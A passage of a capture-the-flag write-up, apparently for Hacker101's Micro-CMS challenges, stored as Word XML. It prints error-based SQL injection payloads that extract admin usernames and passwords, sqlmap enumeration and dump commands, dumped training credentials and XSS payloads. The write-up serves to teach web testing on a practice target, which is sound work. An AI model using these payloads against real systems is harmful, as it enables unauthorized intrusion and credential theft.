          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkStart w:id="45" w:name="username-extraction-payload"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Username Extraction Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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 OR (select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(admins.username as char),0x27,0x7e) FROM `level2`.admins LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' = '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This payload leveraged SQL error-based extraction techniques to retrieve usernames from the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">admins</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">table.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="46" w:name="password-extraction-payload"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Password Extraction Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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 OR (select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(admins.password as char),0x27,0x7e) FROM `level2`.admins LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">' = '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This payload extracted administrator passwords from the backend database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkStart w:id="47" w:name="additional-request-testing"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Additional Request Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Requests were manually tested using curl to observe application behavior and verify endpoint accessibility.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https://04018cf63b303a88fe29557671724cd7.ctf.hacker101.com/page/edit/1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verbose request testing: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https://04018cf63b303a88fe29557671724cd7.ctf.hacker101.com/page/edit/1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">These requests assisted in identifying endpoint behavior and potential authorization weaknesses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="47"/>
    <w:bookmarkStart w:id="48" w:name="optimized-sqlmap-enumeration"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Optimized sqlmap Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following sqlmap command was used to accelerate blind SQL injection enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap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req.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--technique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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--threads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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--batch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--dbs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This improved extraction speed while identifying backend databases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="48"/>
    <w:bookmarkStart w:id="49" w:name="extracted-credentials"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Extracted Credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following administrator credentials were successfully dumped from the backend database:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+----------+----------+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| username | password |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+----------+----------+</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">| jolene   | belia    |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">+----------+----------+</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="49"/>
    <w:bookmarkStart w:id="50" w:name="result-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Successfully dumped administrator credentials from the backend database and used them to authenticate into the web application, leading to flag retrieval.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flag-4-xss-client-side-injection"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Flag 4 — XSS / Client-Side Injection</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="52" w:name="steps-taken-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Steps Taken</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tested reflected and stored inputs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Injected payloads into searchable/input areas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Used Burp Suite to intercept and replay requests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirmed payload execution in browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example payload: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iframe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"javascript:alert(`xss`)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="52"/>
    <w:bookmarkStart w:id="53" w:name="result-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Result</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Successfully triggered XSS and obtained the final flag.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3" w:name="challenge-3-micro-cms-v2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Challenge 3 — Micro-CMS v2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Web</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Difficulty:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Moderate</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="56" w:name="objective-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Exploit more advanced vulnerabilities in the second version of the CMS.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="56"/>
    <w:bookmarkStart w:id="57" w:name="initial-observations"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Initial Observations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compared to v1, this challenge introduced:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Improved validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">More complex request handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Additional authentication logic</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Stronger filtering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The testing methodology focused on:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Parameter tampering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access control bypasses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL injection testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XSS testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Forced browsing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Session manipulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="57"/>
    <w:bookmarkStart w:id="62" w:name="enumeration-methodology"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enumeration Methodology</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="58" w:name="directory-enumeration"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. Directory Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Potential directories tested manually and with wordlists:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/login</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/edit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploads</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/api</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="58"/>
    <w:bookmarkStart w:id="59" w:name="burp-suite-interception"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Burp Suite Interception</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Used Burp Suite Proxy and Repeater to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modify requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Replay authenticated actions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test unauthorized access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Manipulate parameters</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="59"/>
    <w:bookmarkStart w:id="60" w:name="sql-injection-testing"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. SQL Injection Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Used:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap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req.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--dbs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ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap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req.txt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--tables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Followed by:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap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req.txt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--columns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finally:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlmap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req.txt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--dump</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="60"/>
    <w:bookmarkStart w:id="61" w:name="xss-testing"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. XSS Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Injected payloads into:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Search fields</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Comment fields</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CMS content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1018"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Query parameters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Example payloads: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x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> onerror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alert(1)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8" w:name="Xfb0b95747d6d65b64f2ad567d8a5054b43918f8"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Common Methodology Used Across Challenges</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="64" w:name="reconnaissance"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Viewed source code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Checked cookies and headers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enumerated directories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1019"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identified input fields</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="64"/>
    <w:bookmarkStart w:id="65" w:name="interception"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Interception</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Used Burp Suite to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Capture requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modify parameters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Replay requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1020"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Observe responses</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="65"/>
    <w:bookmarkStart w:id="66" w:name="exploitation"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tested for:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1021"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Session Issues</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="66"/>
    <w:bookmarkStart w:id="67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Confirmed successful exploitation by:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Triggering alerts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Accessing restricted resources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dumping database contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Obtaining flags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lessons-learned"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="69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23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Web application enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">SQL injection testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Burp Suite request manipulation</w:t>
